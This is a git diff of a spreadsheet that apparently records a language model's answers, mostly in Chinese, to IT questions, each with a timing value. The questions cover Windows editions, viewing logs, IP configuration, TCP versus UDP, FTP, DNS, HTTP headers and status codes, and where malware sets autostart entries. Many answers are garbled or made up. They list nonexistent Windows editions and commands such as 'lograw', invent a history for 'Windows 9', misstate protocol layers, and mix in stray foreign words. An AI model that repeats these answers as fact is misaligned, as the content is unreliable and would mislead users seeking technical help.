+	* Anniversary Update 添加了一些新的安全功能，如 Windows Defender Credential Guard，以及一些改进的安全功能，如 Windows Hello 2.0 和 Windows Defender SmartScreen 的改进。
+3. Home Edition with Media Center vs. Home Edition without Media Center:
+	* Home Edition with Media Center 具有一些基本的安全功能，如 Windows Defender 和 Windows Firewall，但它没有 BitLocker 和 WDATP。
+	* Home Edition without Media Center 具有较多的安全功能，如 BitLocker 和 WDATP，以及一些其他的安全功能，如 Windows Defender Exploit Guard 和 Windows Defender Application Control。
+4. Pro for Workstations vs. Pro for Small Business:
+	* Pro for Workstations 具有较多的安全功能和企业级特性，如 BitLocker 和 WDATP，以及许多其他的安全功能，如 Windows Defender Exploit Guard 和 Windows Defender Application Control。
+	* Pro for Small Business 具有一些基本的安全功能，如 Windows Defender 和 Windows Firewall，但没有 BitLocker 和 WDATP。
+总之，Home Edition 和 Pro Edition 都具有一些安全功能，但 Pro Edition 具有更多的安全功能和企业级特性。Creators Update 和 Anniversary Update 都增强了 Windows 10 的安全功能，但Home Edition with Media Center 没有 BitLocker 和 WDATP。Pro for Workstations 和 Pro for Small Business 具有更多的安全功能和企业级特性。
+因此，如果您是一个个人用户，您可以考虑使用 Home Edition 或 Pro Edition，具体选择哪一个具体取决于您的需求和预算。如果您是一个企业用户，您可以考虑使用 Enterprise Edition 或 Pro for Workstations，以便获得更多的安全功能和企业级特性。</t>
         </is>
       </c>
       <c r="D103" t="n">
-        <v>14.45948386192322</v>
+        <v>24.47005033493042</v>
       </c>
     </row>
     <row r="104">
@@ -3568,32 +3597,36 @@
       </c>
       <c r="C104" t="inlineStr">
         <is>
-          <t>在Windows系统中，可以使用Event Viewer来查看系统日志。以下是查看系统日志的步驟：
-1. 打开Event Viewer
-在Control Panel中，click onSystem and Security，then click onEvent Viewer。或者，在搜索栏中输入“Event Viewer”并按下Enter键。
-2. 查看系统日志
-在Event Viewer中，您可以查看系统日志，包括系统设置、security、application、windows logs、system logs和 audit logs等。您可以通过浏览日志内容，了解系统的历史记录和发生错误的情况。
-3. 筛选日志
-您可以使用Event Viewer中的筛选功能来筛选日志，根据时间、日志类型和事件类型进行筛选。
-4. 填充日志
-您可以使用Event Viewer中的填充功能来填充日志，以便更好地了解系统的历史记录。
-5. 导出日志
-您可以使用Event Viewer中的导出功能来导出日志，以便将日志保存到文件中或者储存在其他位置。
-6. 查看系统设置日志
-在Event Viewer中，您可以查看系统设置日志，包括系统设置、security、application和windows logs等。
-7. 查看security日志
-在Event Viewer中，您可以查看security日志，包括安全策略、安全警示、安全事件和安全日志等。
-8. 查看application日志
-在Event Viewer中，您可以查看application日志，包括应用程序的启动、关闭和错误等。
-9. 查看windows logs日志
-在Event Viewer中，您可以查看windows logs日志，包括系统启动、系统错误、系统警告和系统告警等。
-10. 查看audit logs日志
-在Event Viewer中，您可以查看audit logs日志，包括系统的访问控制、安全策略和系统日志等。
-总之，通过使用Event Viewer，您可以快速地查看Windows系统的日志，了解系统的历史记录和发生错误的情况。&lt;/s&gt;</t>
+          <t>在Windows系统中，日志可以提供有关系统和应用程序的操作记录，帮助您诊断和 Debug 问题。下面是一些查看Windows系统日志的方法：
+1. Event Viewer
+Event Viewer 是 Windows 的一个标准工具，可以用来查看系统日志。您可以通过以下方式打开 Event Viewer：
+* 输入“eventvwr”在开始菜单中并press Enter。
+* 在“事件浏览器”中，选择“Windows Logs”选项卡，然后选择您想要查看的日志。
+2. System Configuration
+System Configuration 是 Windows 的一个工具，可以用来查看系统日志。您可以通过以下方式打开 System Configuration：
+* 输入“msconfig”在开始菜单中并press Enter。
+* 在“系统 configuration”中，选择“日志”选项卡，然后选择您想要查看的日志。
+3. Command Prompt
+您可以使用 Command Prompt 来查看系统日志。下面是一些命令可以用来查看日志：
+* `lograw`: 显示系统日志的raw数据。
+* `logtail`: 显示系统日志的tail数据。
+* `loglist`: 显示系统日志的列表。
+例如，您可以使用以下命令来查看系统日志：
+`lograw c:\windows\system32\config\system`
+4. third-party tools
+如果您想要更多的功能来查看日志，您可以使用第三方工具。例如，您可以使用 Logparser 来查看系统日志。Logparser 是一个可以用来查看和分析系统日志的工具，可以在以下方式下载：
+* [Logparser](https://www.microsoft.com/download/details.aspx?id=24671)
+您可以使用以下命令来查看系统日志：
+`logparser c:\windows\system32\config\system`
+5. Windows 10 中的查看日志
+在 Windows 10 中，您可以使用“查看日志”工具来查看系统日志。您可以通过以下方式打开“查看日志”：
+* 输入“eventvwr”在开始菜单中并press Enter。
+* 在“事件浏览器”中，选择“Windows 10 日志”选项卡，然后选择您想要查看的日志。
+这些方法可以帮助您查看Windows系统的日志，帮助您诊断和 Debug 问题。</t>
         </is>
       </c>
       <c r="D104" t="n">
-        <v>18.55134272575378</v>
+        <v>20.28799748420715</v>
       </c>
     </row>
     <row r="105">
@@ -3607,25 +3640,28 @@
       </c>
       <c r="C105" t="inlineStr">
         <is>
-          <t>地址
-你可以使用以下方法来查看Windows系统的IP地址：
-1. 在“控制面板”中查看“网络和互联网”选项卡
-在Windows系统中，可以通过控制面板来查看系统的网络设置。请到控制面板中，在左侧导航栏中选择“网络和互联网”选项卡。在这个选项卡上，你可以查看系统的IP地址。
-2. 使用“ipconfig”命令
-你也可以使用“ipconfig”命令在命令行中查看系统的IP地址。请在命令行中输入以下命令：
-```
-ipconfig
-```
-这将显示系统的所有网络设备的IP地址。
-3. 使用“network and internet”客户端
-你也可以使用“network and internet”客户端来查看系统的IP地址。请到“控制面板”中，在左侧导航栏中选择“网络和互联网”选项卡，然后在右侧的“网络和互联网”下拉菜单中选择“网络和互联网客户端”。在这个客户端中，你可以查看系统的IP地址。
-4. 使用第三方工具
-你还可以使用第三方工具来查看系统的IP地址。例如，你可以使用“Hosts”工具来查看系统的IP地址。请到“控制面板”中，在左侧导航栏中选择“系统和安全”选项卡，然后在下拉菜单中选择“系统”。在这个选项卡上，你可以查看系统的IP地址。
-综上所述，你可以使用控制面板、“ipconfig”命令、“network and internet”客户端和第三方工具来查看Windows系统的IP地址。&lt;/s&gt;</t>
+          <t>地址？
+Windows系统中可以使用多种方法来查看系统的IP地址，下面列举一些常见的方法：
+1. 在“开始”菜单中选择“控制面板”，然后在“网络和 Internet”选项卡中查看“ip4 地址”和“ip6 地址”两个表格。
+2. 在“开始”菜单中选择“系统和安全”，然后在“系统”选项卡中查看“系统设置”下的“网络”选项，它将显示系统的IP地址和网络配置。
+3. 使用命令行工具，可以使用“ipconfig”命令来查看系统的IP地址，例如：
+ipconfig /all
+这将显示系统的所有网络配置，包括IP地址、网络名称等。
+4. 使用网络卡控制程序，可以使用网络卡控制程序来查看系统的IP地址，例如：
+以下是一些常用的网络卡控制程序：
+* Windows 10：网络和电话设置
+* Windows 8：控制面板中的网络和Internet选项卡
+* Windows 7：网络和电话设置
+这些程序将显示系统的网络配置，包括IP地址、网络名称等。
+5. 使用 third-party 工具，例如：
+* TcpView：可以查看系统的所有网络连接，包括IP地址、网络名称等。
+* NetStat：可以查看系统的当前网络连接和缓存，包括IP地址、网络名称等。
+这些工具将显示系统的网络配置和连接状况。
+需要注意的是，Windows系统中的IP地址可能会变化，因此需要定期查看系统的IP地址以保持最新的配置。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D105" t="n">
-        <v>15.498459815979</v>
+        <v>15.16547989845276</v>
       </c>
     </row>
     <row r="106">
@@ -3639,23 +3675,22 @@
       </c>
       <c r="C106" t="inlineStr">
         <is>
-          <t>？
-Yes, Windows can be used as a server system. Windows Server is a version of Windows that is specifically designed for use as a server operating system, and it includes many features that make it well-suited for this role. Some of the key features of Windows Server include:
-1. Server Role: Windows Server includes a server role that allows you to easily install and manage server applications and services, such as DNS, DHCP, and IIS.
-2. Remote Access: Windows Server includes tools for remote access, such as Remote Desktop and Remote Access, which allow users to access and control their Windows servers from a remote location.
-3. Networking: Windows Server includes a number of networking features, such as DNS, DHCP, and HTTP/HTTPS server, that are essential for a server system.
-4. Security: Windows Server includes a number of security features, such as User Account Control (UAC), Windows Defender, and Windows Firewall, that help protect your server from unauthorized access and malware.
-5. Scalability: Windows Server is highly scalable, allowing you to easily add more servers to your network as your needs grow.
-6. Active Directory: Windows Server includes Active Directory, which is a powerful directory service that allows you to manage your users, groups, and other network resources.
-7. PowerShell: Windows Server includes PowerShell, a powerful scripting language that allows you to automate many tasks and customize your server configuration.
-8. Hyper-V: Windows Server includes Hyper-V, a hypervisor that allows you to create and manage virtual machines (VMs) on your server.
-9. Failover Clustering: Windows Server includes failover clustering, which allows you to create a cluster of servers that can automatically take over the workload of another server in the event of a failure.
-10. Application Server: Windows Server includes an application server that allows you to host and manage web applications.
-Overall, Windows Server is a powerful and flexible operating system that can be used to build a wide range of server systems, from small to large, depending on your needs.&lt;/s&gt;</t>
+          <t>Yes, Windows can be used as a server system. Windows Server is a version of the Windows operating system that is specifically designed for use as a server, providing a range of features and tools for managing and hosting networks, applications, and other resources.
+Some of the key features of Windows Server include:
+1. Networking: Windows Server provides a range of networking features, including support for DNS, DHCP, and remote access, as well as tools for managing and monitoring network activity.
+2. Security: Windows Server includes a range of security features, such as user authentication, access control, and encryption, to help protect your network and data from unauthorized access.
+3. Storage: Windows Server provides a range of storage features, including support for file sharing, shared disks, and volume shadow copy, as well as tools for managing and monitoring storage activity.
+4. Virtualization: Windows Server provides support for virtualization, allowing you to create and manage virtual machines (VMs) and run multiple operating systems on a single physical server.
+5. Application management: Windows Server provides tools for managing and hosting applications, including support for ASP.NET and other web-based applications, as well as tools for managing and monitoring application activity.
+6. Remote access: Windows Server provides tools for remote access to your network and resources, including support for remote desktop connections and other remote access technologies.
+7. Automation: Windows Server provides tools for automating tasks and processes, including support for Windows PowerShell and other automation tools.
+8. High availability: Windows Server provides features for ensuring high availability of your network and resources, including support for failover clustering and other high availability technologies.
+9. Scalability: Windows Server provides support for scaling your network and resources to meet the needs of your growing business, including support for multi-processor systems and other scalable technologies.
+Overall, Windows Server provides a comprehensive set of features and tools for managing and hosting networks, applications, and other resources, making it a popular choice for server systems.</t>
         </is>
       </c>
       <c r="D106" t="n">
-        <v>11.69133996963501</v>
+        <v>11.26994776725769</v>
       </c>
     </row>
     <row r="107">
@@ -3669,15 +3704,19 @@
       </c>
       <c r="C107" t="inlineStr">
         <is>
-          <t>？  What is Windows 9?
-Windows 9 is a fictional operating system that has been the subject of numerous rumors and speculation over the years. There have been several instances where a new version of Windows, referred to as Windows 9, was announced or leaked, only to be later revealed to be a hoax or a misidentification.
-The first major instance of Windows 9 rumors emerged in the early 2000s, when Microsoft was rumored to be working on a new version of Windows codenamed "Windows 9." At the time, Microsoft was expected to release Windows 9 in 2004, but the project was later canceled and the company instead focused on developing Windows Vista.
-Since then, there have been numerous other instances of Windows 9 rumors, including leaks and speculation about upcoming versions of Windows. However, none of these have been officially confirmed by Microsoft, and the company has consistently maintained that there are no plans to release a new version of Windows 9.
-In summary, Windows 9 is a fictional operating system that has been the subject of numerous rumors and speculation over the years, but there is no official confirmation from Microsoft that such a version exists or is in development.&lt;/s&gt;</t>
+          <t>Windows 9是什么系统？ 
+Windows 9是一个受到评论和猜想的操作系统，它的存在和特性在微软公司内部进行了广泛的评论和猜想。
+Windows 9的概念是在2014年由一位名做Jeffrey Schwartz在一篇名为“Will There Be a Windows 9?”的文章中提出的，他在文章中表示，微软可能会在未来推出一个新的操作系统，它可能会具有类似于Windows 8的功能，但同时具有更多的改进和优化。
+尽管Windows 9的存在没有得到官方证实，但根据一些受到透赏的消息，这个系统可能会具有以下特性：
+1. 改进的用户界面：Windows 9可能会具有一个更加人性化的用户界面，可以更好地适应不同的设备和屏幕尺寸。
+2. 更多的优化：Windows 9可能会具有更多的优化，以提高系统的稳定性、速度和安全性。
+3. 新的功能：Windows 9可能会具有一些新的功能，例如，可能会包含一个新的桌面浏览器，可以在多个桌面之间进行浏览。
+4. 支持更多的设备：Windows 9可能会支持更多的设备，例如，智能手机、平板电脑和其他类型的设备。
+需要注意的是，这些特性都是基于听说和猜想的，它们没有得到官方证实。在actualizaciones系统中，微软可能会采取不同的路线，以满足用户的需求和期望。</t>
         </is>
       </c>
       <c r="D107" t="n">
-        <v>7.006731271743774</v>
+        <v>15.18581390380859</v>
       </c>
     </row>
     <row r="108">
@@ -3691,22 +3730,19 @@
       </c>
       <c r="C108" t="inlineStr">
         <is>
-          <t>？  
-木马病毒通常在Windows系统中哪些地方创建启动项？
-木马病毒通常会在Windows系统中创建启动项以便在系统启动时执行恶意代码。以下是常见的启动项目：
-1. 系统启动条件：木马病毒可以在系统启动时执行恶意代码，通常会在系统启动条件下执行，例如在 boot.ini 文件中添加一个 line。
-2. 注册表：木马病毒可以通过编辑注册表来创建启动项，例如在 HKLM\Run 和 HKLM\RunOnce 下添加一个值。
-3. 启动文件：木马病毒可以在启动文件中添加一个 line，例如在 autorun.inf 文件中添加一个 line。
-4. 隐藏文件：木马病毒可以在隐藏文件中添加一个 line，例如在 C:\Windows\System32\drivers\hosts 文件中添加一个 line。
-5. 网络协议：木马病毒可以在网络协议中添加一个规则，例如在 TCP/UDP 规则下添加一个规则。
-6. 虚拟加密：木马病毒可以在虚拟加密中添加一个规则，例如在虚拟加密规则下添加一个规则。
-7. 注册表键：木马病毒可以在注册表中添加一个键，例如在 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 下添加一个键。
-8. 启动缓冲区：木马病毒可以在启动缓冲区中添加一个值，例如在 C:\Windows\System32\drivers\hosts 文件中添加一个值。
-需要注意的是，这些启动项的名称和路径可能会不同，因此需要根据具体情况进行定制。同时，防止木马病毒创建启动项的方法也有很多，例如使用 antivirus 软件检测和 removemarcos 等工具。&lt;/s&gt;</t>
+          <t>Answer:
+Malware, including viruses, can create startup items in various locations on a Windows system. Here are some common locations where malware may create startup items:
+1. **Startup folder**: The Startup folder is located in the "C:\ProgramData\Microsoft\Windows\Startup" directory. This folder contains a list of programs that are launched automatically when the system boots up. Malware may create a new entry in this folder to start itself when the system boots.
+2. **Task Scheduler**: The Task Scheduler is a built-in Windows tool that allows you to schedule tasks to run at specific times or events. Malware may create a new task in the Task Scheduler to start itself automatically.
+3. **Windows Registry**: The Windows Registry is a database that stores configuration settings and options for the Windows operating system and installed applications. Malware may create new registry keys or modify existing ones to start itself automatically when the system boots.
+4. **AutoRun**: The AutoRun feature in Windows allows applications to run automatically when a removable drive is inserted or when the system boots. Malware may use this feature to start itself when the system boots.
+5. **Boot.ini**: The Boot.ini file is located in the "C:\Windows\Boot.ini" directory. This file contains a list of programs that are loaded during the boot process. Malware may modify this file to include itself as a boot item.
+It's important to note that these locations are not the only places where malware may create startup items. Malware can also create startup items in other locations, such as the "C:\Users\UserName\AppData\Roaming\Microsoft\Windows\Startup" directory or the "C:\ProgramData\Microsoft\Windows\Startup" directory.
+To protect your system from malware, it's essential to regularly scan your system for malware using a reputable antivirus program and to be cautious when opening email attachments or clicking on links from unknown sources.</t>
         </is>
       </c>
       <c r="D108" t="n">
-        <v>18.9875967502594</v>
+        <v>11.35510063171387</v>
       </c>
     </row>
     <row r="109">
@@ -3720,20 +3756,20 @@
       </c>
       <c r="C109" t="inlineStr">
         <is>
-          <t>？
-TCP和UDP是两种常用的网络协议，它们之间有一些主要区别，下面是它们的主要区别：
-1. 确认包：TCP是一种确认包的协议，它会在发送数据包时进行确认，如果数据包在传输过程中不可靠，会重新发送数据包。UDP则不进行确认，只是直接发送数据包。
-2. 错误检测：TCP会在接收数据包时检测数据包的错误，如果发现错误，会返回错误的数据包。UDP不进行错误检测，直接将数据包传输给应用层。
-3. Multicast：TCP不支持Multicast，UDP支持Multicast。
-4. 可靠性：TCP的确认包机制提供了一定的可靠性，可以确保数据的传输，而UDP则不具备这个功能。
-5. 应用层：TCP主要用于Application层的数据传输，而UDP主要用于Transport层的数据传输。
-6. 报文头：TCP的报文头包含了各种信息，如源和目标端口号、Sequence Number、Acknowledgement Number等，而UDP的报文头只包含端口号和数据包的偏移量。
-7. 扩展：TCP具有较强的扩展性，可以让应用层添加新的功能，而UDP的扩展性较弱。
-总的来说，TCP是一种更可靠、更高层次的协议，适用于需要高度可靠性和可靠性的应用，如FSF、FTP、 Telnet等；UDP是一种更快速、更低层次的协议，适用于需要高速传输大量数据的应用，如音频、视频等。&lt;/s&gt;</t>
+          <t>TCP和UDP是两种常用的网络协议，它们的主要区别在于：
+1. 确认包接收：TCP 是一种可靠的协议，它会对数据包进行确认接收，如果不能接收到确认包，则会返回错误。而 UDP 是一种非可靠的协议，它不会对数据包进行确认接收，因此不会返回错误。
+2. 粘包：TCP 会将数据包粘包到一个字节单元中，以确保数据的完整性和正确性。而 UDP 不会粘包数据，因此可能会出现数据损失或不完整的情况。
+3. 可靠性：TCP 具有高度的可靠性，它会对数据包进行确认接收和粘包，以确保数据的完整性和正确性。而 UDP 具有较低的可靠性，它不会对数据包进行确认接收或粘包，因此可能会出现数据损失或不完整的情况。
+4. 协议层：TCP 位于 TCP/IP 协议层之上，而 UDP 位于 UDP/IP 协议层之上。
+5. 应用层：TCP 是一种应用层协议，它主要用于实现 TCP  Socket 的连接，而 UDP 是一种传输层协议，它主要用于实现 UDP  socket 的连接。
+6. 缓冲区：TCP 会在缓冲区中存储数据包，以确保数据的完整性和正确性。而 UDP 不会缓冲数据包，因此可能会出现数据损失或不完整的情况。
+7. 检查SUM：TCP 会在数据包的末尾添加检查SUM，以验证数据的完整性。而 UDP 不会添加检查SUM。
+8. 协议选择：TCP 是一种可选协议，它可以与其他协议（如 UDP）同时使用。而 UDP 是一种强制性协议，它不能与其他协议同时使用。
+总之，TCP 和 UDP 具有不同的设计理念和功能，TCP 适用于需要高度可靠性和数据完整性的应用，例如 FTP、Telnet 等，而 UDP 适用于需要高速传输和低延迟的应用，例如 DNS、DHCP 等。</t>
         </is>
       </c>
       <c r="D109" t="n">
-        <v>16.09382581710815</v>
+        <v>21.93317604064941</v>
       </c>
     </row>
     <row r="110">
@@ -3747,21 +3783,15 @@
       </c>
       <c r="C110" t="inlineStr">
         <is>
-          <t>？
-FTP是一种文件传输协议，属于TCP/IP模型的应用层。具体地，FTP位于TCP/IP模型中的应用层，紧随 TCP 协议之后。
-TCP/IP模型中的各层分别是：
-1. 网络层 (Network Layer)：包括 IP 协议和 ICMP 协议。
-2. 传输层 (Transport Layer)：包括 TCP 协议和 UDP 协议。
-3. 应用层 (Application Layer)：包括 FTP、Telnet、HTTP、SMTP 等协议。
-4. 会话层 (Session Layer)：包括 SSH 协议。
-5.  presentaion层 (Presentation Layer)：包括 SSL/TLS 协议。
-6. 数据驱动层 (Data Link Layer)：包括 Ethernet、PPP 等网络协议。
-7. 物理层 (Physical Layer)：包括电缆、WIFI 等物理层网络协议。
-因此，FTP属于TCP/IP模型中的应用层。&lt;/s&gt;</t>
+          <t>FTP是一种文件传输协议，属于TCP/IP模型中的应用层。具体来说，FTP的层次结构如下：
+1. 应用层：FTP客户端和服务器端之间的交互都是基于应用层协议的。在这个层次结构中，FTP是一种应用层协议，用于文件传输。
+2. 网络层：FTP客户端和服务器端之间的数据传输都是基于网络层协议的。在这个层次结构中，FTP使用 TCP 协议来确保数据的可靠性和可靠性。
+3. 数据链层：FTP客户端和服务器端之间的数据传输都是基于数据链层协议的。在这个层次结构中，FTP使用 IP 协议来确定数据的路由和传输。
+因此，FTP属于TCP/IP模型中的应用层。</t>
         </is>
       </c>
       <c r="D110" t="n">
-        <v>9.932053327560425</v>
+        <v>8.729980945587158</v>
       </c>
     </row>
     <row r="111">
@@ -3775,14 +3805,13 @@
       </c>
       <c r="C111" t="inlineStr">
         <is>
-          <t>？
-DNS是明文的，它是一种分布式、查询式的域名系统。DNS服务器将域名解析成相应的 IP 地址，然后将这个 IP 地址发送给应用程序。因此，DNS 是明文的。
-然而，DNS 也可以使用加密技术来保护域名解析过程中的数据。这种加密技术称为 DNSSEC，它可以防止 DNS 中的数据被恶意攻击或修改。但是，DNSSEC 并不是一种默认的 DNS 功能，需要在 DNS 服务器和客户端之间建立 специаль 的体系。
-总之，DNS 是明文的，但是可以使用加密技术来保护它的安全性。&lt;/s&gt;</t>
+          <t>DNS是一种明文的域名系统，它用于将 компьюте中的域名识别到其相对应的 IP 地址。DNS 使得 компьютер可以访问互联网和其他网络资源，无需记住 IP 地址。
+DNS 不是加密的。它是一种明文的数据交换协议，它使用 plain text 的数据 Format 来传输域名和 IP 地址。这意味着，如果攻击者拥有一个 DNS 解析器，他可以可以查看到你的域名和 IP 地址。因此，在使用 DNS 时，需要特别注意隐私和安全问题。
+在实际应用中，DNS 通常使用加密技术来保护域名和 IP 地址的隐私。例如，DNS over HTTPS (DoH) 是一种新的 DNS 协议，它使用 HTTPS 协议来加密 DNS 数据，以保护用户的隐私。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D111" t="n">
-        <v>6.508389472961426</v>
+        <v>8.6222083568573</v>
       </c>
     </row>
     <row r="112">
@@ -3796,28 +3825,35 @@
       </c>
       <c r="C112" t="inlineStr">
         <is>
-          <t>？
-HTTP请求头有以下几个字段：
-1. `Host`: 指定请求的主机（Host）和端口（Port）。
-2. `User-Agent`: 指定客户端的软件名称和版本号。
-3. `Accept`: 指定客户端可以接受的响应类型（Content-Type）。
-4. `Accept-Language`: 指定客户端的语言地区。
-5. `Accept-Encoding`: 指定客户端的数据编码方式。
-6. `Authorization`: 指定凭据（Authorization）用于请求访问保护的资源。
-7. `Cookie`: 指定客户端已经接收的Cookies（Cookie）。
-8. `Content-Type`: 指定请求体的类型（Content-Type）。
-9. `Content-Length`: 指定请求体的大小（Content-Length）。
-10. `Connection`: 指定客户端和服务器之间的连接方式（Connection）。
-11. `Proxy-Authorization`: 指定客户端是否需要代理服务器的凭据（Proxy-Authorization）。
-12. `If-Modified-Since`: 指定客户端是否需要响应已经修改的资源（If-Modified-Since）。
-13. `If-None-Match`: 指定客户端是否需要响应不存在的资源（If-None-Match）。
-14. `Range`: 指定客户端需要读取的资源的范围（Range）。
-15. `TE`: 指定响应的类型（TE）。
-这些字段可以根据实际情况进行调整，但一般来说，这些字段都是必须的。&lt;/s&gt;</t>
+          <t>HTTP请求头的字段分为两类：
+1. 必需字段：包括请求方法、URL、通信方式、版本等。
+2. 可选字段：包括用户数据、响应的状态等。
+以下是HTTP请求头的常见字段：
+1. 必需字段：
+	* `Method`: 请求方法（GET、POST、PUT、DELETE等）
+	* `Url`: 请求的URL
+	* `Host`: 主机名
+	* `User-Agent`: 用户代理（浏览器或客户端）
+	* `Accept`: 响应的格式（HTML、JSON等）
+	* `Accept-Language`: 语言地区
+	* `Accept-Encoding`: 编解码方式
+	* `Content-Type`: 请求体类型
+2. 可选字段：
+	* `Authorization`: 身份验证信息（ auth token、cookies 等）
+	* `Cookie`: Cookie信息
+	* `Content-Length`: 请求体长度
+	* `Connection`: 连接方式（keep-alive、close等）
+	* `Host`: 主机名
+	* `Proxy-Authorization`: 代理身份验证信息
+	* `Range`: 范围（用于分割大文件）
+	* `If-Modified-Since`: 如果文件修改后，则返回响应
+	* `If-None-Match`: 如果文件不 modified，则返回响应
+	* `If-Unmodified-Since`: 如果文件不 modified，则返回响应
+这些字段的值可以根据需要进行设置和修改。通常情况下，您只需要关注必需字段，即方法、URL、Host 等。可选字段的设置取决于您的需求和使用场景。</t>
         </is>
       </c>
       <c r="D112" t="n">
-        <v>13.30764222145081</v>
+        <v>13.45825004577637</v>
       </c>
     </row>
     <row r="113">
@@ -3831,36 +3867,40 @@
       </c>
       <c r="C113" t="inlineStr">
         <is>
-          <t>？
-HTTP 响应码是指服务器端返回客户端的一个数字代码，用于指示客户端是否 erfolgreich 请求。HTTP 响应码分为以下几种：
-1xx 状态码：表示请求是成功的，但没有任何数据返回。
-* 100 Continue：表示客户端的请求符合服务器端的预期，但服务器端还没有处理请求。
-* 101 Switching Protocols：表示服务器端升级到新的协议。
-2xx 状态码：表示请求是成功的，并且服务器端返回了数据。
-* 200 OK：表示请求是成功的，并且服务器端返回了请求的数据。
-* 201 Created：表示服务器端创建了新的资源，并返回了资源的 Location Header。
-* 202 Accepted：表示服务器端接受了请求，但服务器端的资源 Currently Unavailable 或预约尚未实现。
-* 203 Non-Authoritative Information：表示服务器端返回了另一个资源，该资源不是客户端请求的资源。
-* 204 No Content：表示请求是成功的，但服务器端没有返回任何数据。
-* 205 Reset Content：表示请求是成功的，但服务器端返回了新的数据，用于替代原始数据。
-3xx 状态码：表示请求需要重新进行，或者客户端需要重新发送请求。
-* 300 Multiple Choices：表示服务器端返回了多个可用资源，客户端需要选择哪一个资源。
-* 301 Moved Permanently：表示服务器端搬 trasfer 了资源，客户端需要重新获取资源。
-* 302 Found：表示服务器端搬 transfer 了资源，但客户端可以继续使用原始资源。
-* 303 See Other：表示服务器端返回了其他资源，客户端需要重新获取资源。
-* 304 Not Modified：表示客户端的请求的资源未变，服务器端没有返回任何数据。
-4xx 状态码：表示客户端的请求有误，或者客户端没有执行准备好的请求。
-* 400 Bad Request：表示客户端的请求无效或错误。
-* 401 Unauthorized：表示客户端没有授权，或者客户端的授权已经过期。
-* 402 Payment Required：表示客户端的请求需要支付费用。
-* 403 Forbidden：表示客户端没有权限访问资源。
-* 404 Not Found：表示客户端的请求没有找到相应的资源。
-* 405 Method Not Allowed：表示客户端的请求使用的方法不允许。
-5xx 状态码：表示服务器端的</t>
+          <t>HTTP响应码有很多种，这些响应码的含义和用途都不同。下面是常见的HTTP响应码：
+1xx Informational: 100 Continue, 101 Switching Protocols
+* 100 Continue: 客户端发送请求 Header 的 Complete 标识符，服务器必须在响应 headers 中返回一个 complete 标识符。
+* 101 Switching Protocols: 服务器响应，用于指示客户端应用另一种协议（例如，响应于 HTTP/1.0 请求，服务器将应用 HTTP/1.1）。
+2xx Success: 200 OK, 201 Created, 204 No Content, 205 Reset Content
+* 200 OK: 服务器成功处理请求，并返回响应数据。
+* 201 Created: 服务器成功创建了新资源，并返回响应数据。
+* 204 No Content: 服务器成功处理请求，但无法返回响应数据。
+* 205 Reset Content: 服务器重置了响应数据，以便在下一次请求时重新发送。
+3xx Redirection: 300 Multiple Choices, 301 Moved Permanently, 302 Found, 303 See Other, 304 Not Modified, 305 Use Proxy
+* 300 Multiple Choices: 服务器返回一个列表中的多个可能的资源。
+* 301 Moved Permanently: 服务器重定向到另一个资源。
+* 302 Found: 服务器返回一个资源，但是客户端可以根据Location header选择另一个资源。
+* 303 See Other: 服务器返回一个资源，但是客户端可以根据Location header选择另一个资源。
+* 304 Not Modified: 服务器返回一个资源，以确保客户端知道资源没有发生修改。
+* 305 Use Proxy: 服务器返回一个资源，但是客户端应使用代理服务器来访问。
+4xx Client errors: 400 Bad Request, 401 Unauthorized, 402 Payment Required, 403 Forbidden, 404 Not Found, 405 Method Not Allowed
+* 400 Bad Request: 客户端发送的请求无法被解析或验证。
+* 401 Unauthorized: 客户端未提供正确的身份验证信息。
+* 402 Payment Required: 客户端未提供支付信息。
+* 403 Forbidden: 客户端尝试访问禁止的资源或方法。
+* 404 Not Found: 客户端尝试访问不存在的资源。
+* 405 Method Not Allowed: 客户端发送的请求方法不允许。
+5xx Server errors: 500 Internal Server Error, 502 Bad Gateway, 503 Service Unavailable, 504 Gateway Timeout, 505 HTTP Version Not Supported
+* 500 Internal Server Error: 服务器遇到了内部错误，无法处理请求。
+* 502 Bad Gateway: 服务器在响应数据时遇到了问题，并且无法重定向客户端。
+* 503 Service Unavailable: 服务器当前无法处理请求，但是将在将来尝试处理请求。
+* 504 Gateway Timeout: 服务器处理请求时间超时。
+* 505 HTTP Version Not Supported: 客户端使用的HTTP协议不被服务器支持。
+需要注意的是，这些响应码只是HTTP协议中规定的一些常见响应码，实际情况中可能会有更多的响应码。 additionally，服务器可以返回其他的响应码以指示更多的情况，例如，401 Unauthorized 和 403 Forbidden 可以用于指示访问权限不够，而不是客户端发送的请求无法被解析或验证。</t>
         </is>
       </c>
       <c r="D113" t="n">
-        <v>26.58223152160645</v>
+        <v>34.4726665019989</v>
       </c>
     </row>
     <row r="114">
@@ -3874,19 +3914,18 @@
       </c>
       <c r="C114" t="inlineStr">
         <is>
-          <t>？
-HTTPS（Hypertext Transfer Protocol Secure）是HTTP的安全升级版，它使用SSL（Secure Sockets Layer）或TLS（Transport Layer Security）协议来保护网络上的数据交互。HTTPS通过加密请求和响应数据，以防止恶意攻击者 intercept 或 tamper 电子邮件、个人信息等，同时还可以确保数据的身份验证和数据Integrity。
+          <t>HTTPS是Hypertext Transfer Protocol Secure的缩写，是一种安全的网络通信协议。它使用SSL/TLS协议加密数据，从而保护用户隐私和数据安全。
+HTTPS通常用于在互联网上进行安全的通信，如在线银行、电子商务、访问敏感数据等场景。它可以使用HTTP代理服务器或Direct Connection模式来实现安全的通信。
 HTTPS的主要特点包括：
-1. 加密：HTTPS使用加密技术来保护请求和响应数据，防止恶意攻击者 intercept 或 tamper 数据。
-2. 身份验证：HTTPS使用证书来 authenticate 服务器的身份，防止恶意攻击者 masquerading 成合法的服务器。
-3. 数据Integrity：HTTPS使用加密技术来保护数据的完整性和integrity，防止恶意攻击者 modify 或 tamper 数据。
-4. 权利证：HTTPS使用证书来签名请求和响应数据，防止恶意攻击者 modify 或 tamper 数据。
-5. 安全协议：HTTPS使用安全协议来保护数据的交互，防止恶意攻击者 interfere 或 tamper 数据。
-总之，HTTPS是HTTP的安全升级版，可以保护网络上的数据交互，防止恶意攻击者 intercept 或 tamper 数据，同时还可以确保数据的身份验证和数据Integrity。&lt;/s&gt;</t>
+1. 加密：使用SSL/TLS协议加密数据，防止恶意攻击者 intercept 和窃走数据。
+2. 身份验证：使用证书身份验证，确保通信方的身份是正确的。
+3. 权利验证：使用证书权利验证，确保通信方有权访问敏感数据。
+4. 数据integrity：使用SSL/TLS协议保证数据的完整性和一致性。
